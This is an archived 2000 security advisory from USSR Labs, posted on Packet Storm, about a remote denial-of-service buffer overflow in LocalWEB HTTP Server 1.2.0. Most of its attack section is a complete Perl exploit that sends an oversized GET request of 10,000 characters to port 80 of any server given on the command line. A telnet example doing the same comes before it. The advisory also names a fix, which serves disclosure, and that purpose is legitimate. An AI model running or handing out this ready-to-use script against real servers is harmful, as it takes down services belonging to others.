exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

labs48.txt

labs48.txt
Posted Jul 4, 2000
Site ussrback.com

LocalWEB HTTP Server v. 1.20 remote dos attack - Sending a malformed URL to port 80 causes a buffer to be overflow resulting in a denial of service. Includes perl exploit.

tags | remote, web, denial of service, overflow, perl
SHA-256 | ae66ac0f9d4486258392b6e5e9de670cd146472dcf0dbc59417ba7cdc6d2c386

labs48.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote DoS Attack in LocalWEB HTTP Server 1.2.0 Vulnerability

"THE KING IS COMING"

USSR Advisory Code: USSR-2000048

Release Date:
July 4, 2000

Systems Affected:
LocalWEB HTTP Server 1.2.0

THE PROBLEM

The Ussr Labs team has recently discovered a buffer overflow memory
problem in the LocalWEB HTTP Server.
What happens is by performing an attack with a malformed URL request
to port 80 it will cause the process containing the services to stop
responding.

SPECIAL NOTE: That we take no responsibility for this code it is for
educational purposes only.

Example:
The http Server (Port 80) service has an overflow in the GET command

[hellme@die-communitech.net$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /[buffer]

Where [buffer] is approx. 10000 characters, and the process containg
the service crashes

Code in Perl:
- -------------------------Start File----------------------
#!/usr/bin/perl
#
# ./$0.pl -s <server>
#
# Malformed GET URL request DoS
#
use Getopt::Std;
use Socket;

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # this is the NOP
$number = "10000"; # this is the total number of NOP
$data .= $foo x $number; # result of $foo times $number
$serv = $args{s}; # remote server
$port = 80; # remote port, default is 80
$buf = "GET /$data HTTP/1.0\r\n\r\n"; # issue this response to the
server

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("Data has been successfully sent to $serv\n");

sub usage {die("\n\n$0 -s <server>\n\n");}
- -------------------------End File----------------------


Vendor Status:
Informed!, Contacted

Fix:
Upgrade to 2.0 here: http://www.west-street.co.uk/download.htm

Vendor Url: http://www.west-street.co.uk/
Program Url: http://www.west-street.co.uk/localweb.htm

Related Links:

Underground Security Systems Research:
http://www.ussrback.com

CrunchSp Product:
http://www.crunchsp.com

Greetings:
Attrition, w00w00, beavuh, Rhino9, Synnergy.net, SecurityFocus.com,
ADM, HNC, #Synnergy (efnet),#hackphreak (efnet), Technotronic, RFP
and Wiretrip.

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of Ussr. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
labs@ussrback.com for permission.

Disclaimer:
The information within this paper may change without notice. We may
not be held responsible for the use and/or potential effects of these
programs or advisories, use them and read them at your own risk or
not at all. You solely are responsible for this judgement.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOWHhC63JcbWNj6DDEQJ96wCg9DGWzqc0FMYy50mQ1Tt/Rs7yFpYAn343
kUXqk1LYV5oMaQEI2V3MayvZ
=zv1N
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close